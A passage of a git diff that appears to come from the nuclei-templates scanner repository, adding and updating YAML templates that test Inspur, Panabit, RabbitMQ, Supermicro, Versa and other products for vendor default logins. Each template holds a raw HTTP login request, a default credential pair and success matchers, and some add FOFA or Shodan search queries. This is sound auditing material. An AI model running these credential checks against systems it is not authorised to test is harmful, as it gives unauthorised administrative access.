ritikchaddha + severity: high + reference: + - https://blog.csdn.net/qq_36197704/article/details/115665793 + metadata: + fofa-query: title="TSCEV4.0" + tags: inspur,clusterengine,default-login + +requests: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + + op=login&username={{username}}&password={{password}} + + attack: pitchfork + payloads: + username: + - admin|pwd + password: + - 123456 + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"exitcode":0' + + - type: word + part: header + words: + - "username=admin|pwd" + condition: and + + - type: status + status: + - 200 diff --git a/default-logins/others/kingsoft-v8-default-login.yaml b/default-logins/others/kingsoft-v8-default-login.yaml new file mode 100644 index 0000000000..65324337cd --- /dev/null +++ b/default-logins/others/kingsoft-v8-default-login.yaml @@ -0,0 +1,38 @@ +id: kingsoft-v8-default-login + +info: + name: Kingsoft V8 Default Login + author: ritikchaddha + severity: medium + reference: + - https://idc.wanyunshuju.com/aqld/2123.html + tags: kingsoft,default-login + +requests: + - raw: + - | + POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1 + Host: {{Hostname}} + + {"get_user_login_cmd":{"name":"{{username}}","password":"{{md5("{{password}}")}}"}} + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ADMIN" + - "userSession" + condition: and + + - type: status + status: + - 200 diff --git a/default-logins/others/panabit-ixcache-default-login.yaml b/default-logins/others/panabit-ixcache-default-login.yaml new file mode 100644 index 0000000000..6ca7af1572 --- /dev/null +++ b/default-logins/others/panabit-ixcache-default-login.yaml @@ -0,0 +1,36 @@ +id: panabit-ixcache-default-login + +info: + name: Panabit iXCache Default Login + author: ritikchaddha + severity: high + reference: + - http://forum.panabit.com/thread-10830-1-1.html + tags: ixcache,default-login,panabit + +requests: + - raw: + - | + POST /login/userverify.cgi HTTP/1.1 + Host: {{Hostname}} + + username={{username}}&password={{password}} + + payloads: + username: + - admin + password: + - ixcache + attack: pitchfork + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "URL=/cgi-bin/monitor.cgi" + + - type: status + status: + - 200 diff --git a/default-logins/others/secnet-ac-default-login.yaml b/default-logins/others/secnet-ac-default-login.yaml new file mode 100644 index 0000000000..685125e478 --- /dev/null +++ b/default-logins/others/secnet-ac-default-login.yaml @@ -0,0 +1,42 @@ +id: secnet-ac-default-password + +info: + name: secnet-ac-default-password + author: ritikchaddha + severity: high + description: secnet ac default admin credentials were discovered. + reference: + - https://bbs.secnet.cn/post/t-30 + tags: secnet,default-login + +requests: + - raw: + - | + POST /login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&password={{password}} + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "window.open('index.htm" + + - type: word + part: header + words: + - "ac_userid={{username}},ac_passwd=" + + - type: status + status: + - 200 diff --git a/default-logins/others/telecom-gateway-default-login.yaml b/default-logins/others/telecom-gateway-default-login.yaml new file mode 100644 index 0000000000..08f2ecd266 --- /dev/null +++ b/default-logins/others/telecom-gateway-default-login.yaml @@ -0,0 +1,37 @@ +id: telecom-gateway-default-login + +info: + name: Telecom Gateway Default Login + author: ritikchaddha + severity: high + tags: telecom,default-login,gateway + +requests: + - raw: + - | + POST /manager/login.php HTTP/1.1 + Host: {{Hostname}} + + Name={{username}}&Pass={{password}} + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "电信网关服务器管理后台" + - "index-shang.php" + - "di.php" + condition: and + + - type: status + status: + - 200 diff --git a/default-logins/paloalto/panos-default-login.yaml b/default-logins/paloalto/panos-default-login.yaml index 2e218f2bc2..be0806c0be 100644 --- a/default-logins/paloalto/panos-default-login.yaml +++ b/default-logins/paloalto/panos-default-login.yaml @@ -4,8 +4,13 @@ info: name: Palo Alto Networks PAN-OS Default Login author: Techryptic (@Tech) severity: high - description: Default Login of admin:admin on Palo Alto Networks PAN-OS application. - reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. + description: Palo Alto Networks PAN-OS application default admin credentials were discovered. + reference: + - https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: panos,default-login requests: @@ -37,4 +42,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/panabit/panabit-default-login.yaml b/default-logins/panabit/panabit-default-login.yaml index d790a10942..41b1eb6bb4 100644 --- a/default-logins/panabit/panabit-default-login.yaml +++ b/default-logins/panabit/panabit-default-login.yaml @@ -2,9 +2,19 @@ id: panabit-default-login info: name: Panabit Gateway Default Login - author: pikpikcu + author: pikpikcu,ritikchaddha severity: high - reference: https://max.book118.com/html/2017/0623/117514590.shtm + description: Panabit Gateway default credentials were discovered. + reference: + - https://max.book118.com/html/2017/0623/117514590.shtm + - https://en.panabit.com/wp-content/uploads/Panabit-Intelligent-Application-Gateway-04072020.pdf + - https://topic.alibabacloud.com/a/panabit-monitoring-installation-tutorial_8_8_20054193.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + metadata: + fofa-query: app="Panabit-智能网关" tags: panabit,default-login requests: @@ -19,31 +29,38 @@ requests: Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 ------WebKitFormBoundaryAjZMsILtbrBp8VbC - Content-Disposition: form-data; name="{{username}}" + Content-Disposition: form-data; name="username" - admin + {{username}} ------WebKitFormBoundaryAjZMsILtbrBp8VbC - Content-Disposition: form-data; name="{{password}}" + Content-Disposition: form-data; name="password" - panabit + {{password}} ------WebKitFormBoundaryAjZMsILtbrBp8VbC-- payloads: username: - - username + - admin password: - - password + - panabit attack: pitchfork matchers-condition: and matchers: - type: word + part: body words: - '' - 'urn:schemas-microsoft-com:vml' - part: body condition: and + - type: word + part: header + words: + - "paonline_admin" + - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/pentaho/pentaho-default-login.yaml b/default-logins/pentaho/pentaho-default-login.yaml index a91dfc9bd8..e4ba5681b5 100644 --- a/default-logins/pentaho/pentaho-default-login.yaml +++ b/default-logins/pentaho/pentaho-default-login.yaml @@ -1,38 +1,47 @@ -id: pentaho-default-login - -info: - name: Pentaho Default Login - author: pussycat0x - severity: high - metadata: - shodan-query: pentaho - tags: pentaho,default-login - -requests: - - raw: - - | - POST /pentaho/j_spring_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - j_username={{user}}&j_password={{pass}} - - attack: pitchfork - payloads: - user: - - admin - pass: - - password - - matchers-condition: and - matchers: - - type: word - part: header - words: - - 'pentaho/Home' - - 'JSESSIONID=' - condition: and - - - type: status - status: - - 302 +id: pentaho-default-login + +info: + name: Pentaho Default Login + author: pussycat0x + severity: high + description: Pentaho default admin credentials were discovered. + reference: + - https://www.hitachivantara.com/en-us/pdfd/training/pentaho-lesson-1-user-console-overview.pdf + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: pentaho + tags: pentaho,default-login + +requests: + - raw: + - | + POST /pentaho/j_spring_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + j_username={{user}}&j_password={{pass}} + + attack: pitchfork + payloads: + user: + - admin + pass: + - password + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'pentaho/Home' + - 'JSESSIONID=' + condition: and + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/rabbitmq/rabbitmq-default-login.yaml b/default-logins/rabbitmq/rabbitmq-default-login.yaml index 4497061308..001085654d 100644 --- a/default-logins/rabbitmq/rabbitmq-default-login.yaml +++ b/default-logins/rabbitmq/rabbitmq-default-login.yaml @@ -1,9 +1,16 @@ id: rabbitmq-default-login info: - name: RabbitMQ admin Default Login + name: RabbitMQ Default Login author: fyoorer,dwisiswant0 severity: high + description: RabbitMQ default admin credentials were discovered. + reference: + - https://onlinehelp.coveo.com/en/ces/7.0/administrator/changing_the_rabbitmq_administrator_password.htm + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: rabbitmq,default-login requests: @@ -34,3 +41,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/rainloop/rainloop-default-login.yaml b/default-logins/rainloop/rainloop-default-login.yaml new file mode 100644 index 0000000000..ad0cf18a01 --- /dev/null +++ b/default-logins/rainloop/rainloop-default-login.yaml @@ -0,0 +1,53 @@ +id: rainloop-default-login + +info: + name: Rainloop WebMail Default Login + author: For3stCo1d + severity: high + reference: + - https://github.com/RainLoop/rainloop-webmail/issues/28 + metadata: + fofa-query: app="RAINLOOP-WebMail" + tags: rainloop,webmail,default-login,foss + +requests: + - raw: + - | # Login Portal: /?admin + GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1 + Host: {{Hostname}} + + - | + POST /?/Ajax/&q[]=/0/ HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + Login={{user}}&Password={{pass}}&Action=AdminLogin&XToken={{token}} + + attack: pitchfork + payloads: + user: + - admin + + pass: + - 12345 + + cookie-reuse: true + extractors: + - type: regex + name: token + internal: true + group: 1 + regex: + - 'token":"(.+?)"' + + matchers-condition: and + matchers: + - type: word + words: + - '"Action":"AdminLogin"' + - '"Result":true' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/default-logins/rancher/rancher-default-login.yaml b/default-logins/rancher/rancher-default-login.yaml index 9eadc6d68c..53ec21868c 100644 --- a/default-logins/rancher/rancher-default-login.yaml +++ b/default-logins/rancher/rancher-default-login.yaml @@ -4,8 +4,14 @@ info: name: Rancher Default Login author: princechaddha severity: high - description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes. - reference: https://github.com/rancher/rancher + description: Rancher default admin credentials were discovered. Rancher is an open-source multi-cluster orchestration platform that lets operations teams deploy, manage and secure enterprise Kubernetes. + reference: + - https://github.com/rancher/rancher + - https://rancher.com/docs/rancher/v2.5/en/admin-settings/authentication/local/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,rancher,kubernetes,devops,cloud requests: @@ -50,3 +56,5 @@ requests: part: header regex: - 'Set-Cookie: CSRF=([a-z0-9]+)' + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/ricoh/ricoh-weak-password.yaml b/default-logins/ricoh/ricoh-weak-password.yaml index 8e21ee4482..15c37d210c 100644 --- a/default-logins/ricoh/ricoh-weak-password.yaml +++ b/default-logins/ricoh/ricoh-weak-password.yaml @@ -1,11 +1,17 @@ -id: ricoh-weak-password +id: ricoh-default-login info: - name: Ricoh Weak Password + name: Ricoh Default Login author: gy741 severity: high + description: Ricoh default admin credentials were discovered. + reference: + - https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: ricoh,default-login - reference: https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/ requests: - raw: @@ -31,3 +37,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/rockmongo/rockmongo-default-login.yaml b/default-logins/rockmongo/rockmongo-default-login.yaml index 8fb0fdf1ee..5e22fa91ad 100644 --- a/default-logins/rockmongo/rockmongo-default-login.yaml +++ b/default-logins/rockmongo/rockmongo-default-login.yaml @@ -4,6 +4,13 @@ info: name: Rockmongo Default Login author: pikpikcu severity: high + description: Rockmongo default admin credentials were discovered. + reference: + - https://serverfault.com/questions/331315/how-to-change-the-default-admin-username-and-admin-password-in-rockmongo + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: rockmongo,default-login requests: @@ -35,3 +42,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/rseenet/rseenet-default-login.yaml b/default-logins/rseenet/rseenet-default-login.yaml new file mode 100644 index 0000000000..a1d7ad8cb3 --- /dev/null +++ b/default-logins/rseenet/rseenet-default-login.yaml @@ -0,0 +1,44 @@ +id: rseenet-default-login + +info: + name: Advantech R-SeeNet Default Login + author: princechaddha + severity: high + description: Advantech R-SeeNet default admin credentials were discovered. R-SeeNet is a software system used for monitoring of status and functions of Advantech routers. + reference: + - https://icr.advantech.cz/products/software/r-seenet + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: rseenet,default-login + +requests: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + page=login_change&oper=0&username={{user}}&password={{pass}}&submit=Login + + attack: pitchfork + payloads: + user: + - admin + pass: + - conel + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'R-SeeNet (.*)' + + - type: word + part: body + words: + - "User is succesfully logged." + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/samsung/samsung-wlan-default-login.yaml b/default-logins/samsung/samsung-wlan-default-login.yaml index 9b2e264515..a4fcd733ef 100644 --- a/default-logins/samsung/samsung-wlan-default-login.yaml +++ b/default-logins/samsung/samsung-wlan-default-login.yaml @@ -4,7 +4,13 @@ info: name: Samsung Wlan AP (WEA453e) Default Login author: pikpikcu severity: high - reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ + description: Samsung Wlan AP (WEA453e) default root credentials were discovered. + reference: + - https://securityforeveryone.com/tools/samsung-wlan-ap-wea453e-default-credentials-scanner + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: samsung,default-login requests: @@ -33,3 +39,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/seeddms/seeddms-default-login.yaml b/default-logins/seeddms/seeddms-default-login.yaml index 695086cbe2..9b37bf93bc 100644 --- a/default-logins/seeddms/seeddms-default-login.yaml +++ b/default-logins/seeddms/seeddms-default-login.yaml @@ -1,10 +1,17 @@ id: seeddms-default-login info: - name: SeedDMS Default Credential + name: SeedDMS Default Login author: alifathi-h1 severity: high - reference: https://www.redhat.com/sysadmin/install-seeddms + description: SeedDMS default admin credentials were discovered. + reference: + - https://www.seeddms.org/index.php?id=2 + - https://www.redhat.com/sysadmin/install-seeddms + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,seeddms requests: @@ -32,4 +39,6 @@ requests: - type: status status: - - 302 \ No newline at end of file + - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/sequoiadb/sequoiadb-default-login.yaml b/default-logins/sequoiadb/sequoiadb-default-login.yaml new file mode 100644 index 0000000000..6fea4daaf0 --- /dev/null +++ b/default-logins/sequoiadb/sequoiadb-default-login.yaml @@ -0,0 +1,51 @@ +id: sequoiadb-default-login + +info: + name: SequoiaDB Default Login + author: dhiyaneshDk + severity: high + description: SequoiaDB default admin credentials were discovered. + reference: + - https://www.sequoiadb.com/en/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: default-login,sequoiadb + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 + SdbLanguage: en + + cmd=login&user={{username}}&passwd={{md5(password)}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: dsl + dsl: + - contains(tolower(all_headers), 'sdbsessionid') + + - type: word + part: body + words: + - '{ "errno": 0 }' + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/showdoc/showdoc-default-login.yaml b/default-logins/showdoc/showdoc-default-login.yaml index 056d562bcb..597a3657bb 100644 --- a/default-logins/showdoc/showdoc-default-login.yaml +++ b/default-logins/showdoc/showdoc-default-login.yaml @@ -4,8 +4,13 @@ info: name: Showdoc Default Login author: pikpikcu severity: medium + description: Showdoc default credentials were discovered. reference: - https://blog.star7th.com/2016/05/2007.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 tags: showdoc,default-login requests: @@ -36,3 +41,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/solarwinds/solarwinds-default-login.yaml b/default-logins/solarwinds/solarwinds-default-login.yaml index 421104562e..f2391f8c00 100644 --- a/default-logins/solarwinds/solarwinds-default-login.yaml +++ b/default-logins/solarwinds/solarwinds-default-login.yaml @@ -4,12 +4,18 @@ info: name: SolarWinds Orion Default Login author: dwisiswant0 severity: high + description: SolarWinds Orion default admin credentials were discovered. + reference: + - https://github.com/solarwinds/OrionSDK/wiki/REST + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: solarwinds,default-login - reference: https://github.com/solarwinds/OrionSDK/wiki/REST - # Optional: - # POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 - # {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} +# Optional: +# POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 +# {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} requests: - raw: @@ -43,3 +49,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/spectracom/spectracom-default-login.yaml b/default-logins/spectracom/spectracom-default-login.yaml index 07b09fe30a..f091831f32 100644 --- a/default-logins/spectracom/spectracom-default-login.yaml +++ b/default-logins/spectracom/spectracom-default-login.yaml @@ -3,7 +3,14 @@ id: spectracom-default-login info: name: Spectracom Default Login author: madrobot - severity: medium + severity: high + description: Spectracom default admin credentials were discovered. + reference: + - https://orolia.com/manuals/NC/Content/NC_and_SS/Com/Topics/ADMIN/Passwords.htm + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: spectracom,default-login requests: @@ -34,3 +41,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/stackstorm/stackstorm-default-login.yaml b/default-logins/stackstorm/stackstorm-default-login.yaml new file mode 100644 index 0000000000..df46febdff --- /dev/null +++ b/default-logins/stackstorm/stackstorm-default-login.yaml @@ -0,0 +1,46 @@ +id: stackstorm-default-login + +info: + name: StackStorm Default Login + author: PaperPen + severity: high + description: A StackStorm default admin login was discovered. + reference: + - https://github.com/StackStorm/st2-docker + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + fofa-query: app="stackstorm" + tags: stackstorm,default-login + +requests: + - raw: + - | + POST /auth/tokens HTTP/1.1 + Host: {{BaseURL}} + Content-Type: application/json + Authorization: Basic {{base64(username + ':' + password)}} + + attack: pitchfork + payloads: + username: + - st2admin + password: + - Ch@ngeMe + + matchers-condition: and + matchers: + - type: word + words: + - '"user":' + - '"token":' + - '"expiry":' + condition: and + + - type: status + status: + - 201 + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/supermicro/supermicro-default-login.yaml b/default-logins/supermicro/supermicro-default-login.yaml new file mode 100644 index 0000000000..14c7e91cd3 --- /dev/null +++ b/default-logins/supermicro/supermicro-default-login.yaml @@ -0,0 +1,41 @@ +id: supermicro-default-login + +info: + name: Supermicro Ipmi Default Login + author: For3stCo1d + severity: high + reference: + - https://www.gearprimer.com/wiki/supermicro-ipmi-default-username-pasword/ + tags: supermicro,default-login + +requests: + - raw: + - | + POST /cgi/login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + name={{user}}&pwd={{pass}} + + attack: pitchfork + payloads: + user: + - ADMIN + - admin + pass: + - ADMIN + - admin + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'self.location=' + - '/cgi/url_redirect.cgi?url_name=mainmenu' + condition: and + + - type: status + status: + - 200 diff --git a/default-logins/szhe/szhe-default-login.yaml b/default-logins/szhe/szhe-default-login.yaml index cb6a6fe9b0..c1be8a2077 100644 --- a/default-logins/szhe/szhe-default-login.yaml +++ b/default-logins/szhe/szhe-default-login.yaml @@ -3,10 +3,15 @@ id: szhe-default-login info: name: Szhe Default Login author: pikpikcu - severity: low - tags: szhe,default-login + severity: medium + description: Szhe default login information was discovered. reference: - - https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage + - https://github.com/Cl0udG0d/SZhe_Scan + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + tags: szhe,default-login requests: - raw: @@ -39,3 +44,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/versa/versa-default-login.yaml b/default-logins/versa/versa-default-login.yaml new file mode 100644 index 0000000000..85af8013e8 --- /dev/null +++ b/default-logins/versa/versa-default-login.yaml @@ -0,0 +1,54 @@ +id: versa-default-login + +info: + name: Versa Networks SD-WAN Application Default Login + author: davidmckennirey + severity: high + description: Versa Networks SD-WAN application default admin credentials were discovered. + reference: + - https://versa-networks.com/products/sd-wan.php + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: default-login,versa,sdwan + +requests: + - raw: + - | + GET /versa/login.html HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + - | + POST /versa/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{user}}&password={{pass}}&sso=systemRadio + + attack: pitchfork + payloads: + user: + - Administrator + pass: + - versa123 + + cookie-reuse: true + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'status_code_2 == 302' + - "contains(tolower(all_headers_2), 'jsessionid')" + - "contains(tolower(all_headers_2), 'location: /versa/index.html')" + condition: and + + - type: dsl + dsl: + - "contains(tolower(all_headers_2), '/login?error=true')" + - "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')" + negative: true + +# Enhanced by mp on 2022/04/06 diff --git a/default-logins/vidyo/vidyo-default-login.yaml b/default-logins/vidyo/vidyo-default-login.yaml index a9eb24bbcc..e426b9737b 100644 --- a/default-logins/vidyo/vidyo-default-login.yaml +++ b/default-logins/vidyo/vidyo-default-login.yaml @@ -4,11 +4,15 @@ info: name: Vidyo Default Login author: izn0u severity: medium - description: test for default cred super:password - reference: https://support.vidyocloud.com/hc/en-us/articles/226265128 + description: Vidyo default credentials were discovered. + reference: + - https://support.vidyocloud.com/hc/en-us/articles/226265128 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 tags: vidyo,default-login - requests: - raw: - | @@ -58,4 +62,6 @@ requests: - type: status status: - - 302 \ No newline at end of file + - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/viewpoint/trilithic-viewpoint-login.yaml b/default-logins/viewpoint/trilithic-viewpoint-login.yaml index d26dd6f456..1ea9daf5b1 100644 --- a/default-logins/viewpoint/trilithic-viewpoint-login.yaml +++ b/default-logins/viewpoint/trilithic-viewpoint-login.yaml @@ -4,8 +4,11 @@ info: name: Trilithic Viewpoint Default Login author: davidmckennirey severity: high - description: | - Searches for default admin credentials for the (discontinued) Trilithic Viewpoint application. + description: Trilithic Viewpoint application default admin credentials were discovered. Note this product has been discontinued. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,trilithic,viewpoint requests: @@ -36,4 +39,6 @@ requests: - '"authorized":true' - 'redirectUrl' part: body - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/13 diff --git a/default-logins/visionhub/visionhub-default-login.yaml b/default-logins/visionhub/visionhub-default-login.yaml index df2983be93..91e0f51048 100644 --- a/default-logins/visionhub/visionhub-default-login.yaml +++ b/default-logins/visionhub/visionhub-default-login.yaml @@ -4,9 +4,14 @@ info: name: VisionHub Default Login author: Techryptic (@Tech) severity: high - description: Default Login of admin:admin on VisionHub application. + description: VisionHub application default admin credentials were accepted. + reference: + - https://www.qognify.com/products/visionhub/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: visionhub,default-login - reference: https://www.qognify.com/products/visionhub/ requests: - raw: @@ -31,4 +36,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/04/06 diff --git a/default-logins/weblogic/weblogic-weak-login.yaml b/default-logins/weblogic/weblogic-weak-login.yaml index 272933d9cf..558792b844 100644 --- a/default-logins/weblogic/weblogic-weak-login.yaml +++ b/default-logins/weblogic/weblogic-weak-login.yaml @@ -1,11 +1,18 @@ id: weblogic-weak-login info: - name: WebLogic weak login + name: WebLogic Default Login author: pdteam severity: high + description: WebLogic default login credentials were discovered. + reference: + - https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password + - https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,weblogic - reference: https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password requests: - raw: @@ -55,4 +62,6 @@ requests: - type: status status: - - 302 \ No newline at end of file + - 302 + +# Enhanced by mp on 2022/04/05 diff --git a/default-logins/wifisky/wifisky-default-login.yaml b/default-logins/wifisky/wifisky-default-login.yaml index c6d731deb0..382c186fed 100644 --- a/default-logins/wifisky/wifisky-default-login.yaml +++ b/default-logins/wifisky/wifisky-default-login.yaml @@ -4,6 +4,17 @@ info: name: Wifisky Default Login author: pikpikcu severity: high + description: Wifisky default admin credentials were discovered. + reference: + - https://securityforeveryone.com/tools/wifisky-default-password-scanner + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + verified: true + shodan-query: title:"WIFISKY-7层流控路由器" + fofa-query: app="WIFISKY-7层流控路由器" tags: default-login,wifisky requests: @@ -42,4 +53,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/13 diff --git a/default-logins/wso2/wso2-default-login.yaml b/default-logins/wso2/wso2-default-login.yaml index 9e3fd49b53..098f99704f 100644 --- a/default-logins/wso2/wso2-default-login.yaml +++ b/default-logins/wso2/wso2-default-login.yaml @@ -4,7 +4,14 @@ info: name: WSO2 Management Console Default Login author: cocxanh severity: high - reference: https://docs.wso2.com/display/UES100/Accessing+the+Management+Console + description: WSO2 Management Console default admin credentials were discovered. + reference: + - https://docs.wso2.com/display/UES100/Accessing+the+Management+Console + - https://is.docs.wso2.com/en/5.12.0/learn/multi-attribute-login/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,wso2 requests: @@ -31,3 +38,5 @@ requests: - "JSESSIONID" part: header condition: and + +# Enhanced by mp on 2022/04/05 diff --git a/default-logins/xerox/xerox7-default-login.yaml b/default-logins/xerox/xerox7-default-login.yaml new file mode 100644 index 0000000000..ae8291f1b4 --- /dev/null +++ b/default-logins/xerox/xerox7-default-login.yaml @@ -0,0 +1,53 @@ +id: xerox7-default-login + +info: + name: Xerox 